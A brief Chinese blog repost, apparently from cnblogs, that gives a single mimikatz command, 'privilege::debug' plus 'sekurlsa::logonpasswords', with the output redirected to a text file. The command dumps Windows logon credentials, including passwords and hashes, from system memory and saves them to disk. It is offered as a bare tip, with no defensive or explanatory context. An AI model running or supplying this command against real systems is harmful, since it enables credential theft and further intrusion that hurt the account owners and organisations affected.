mimikatz将结果输出到一个文本的命令

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

猜你喜欢

转载自www.cnblogs.com/ldhbetter/p/9391913.html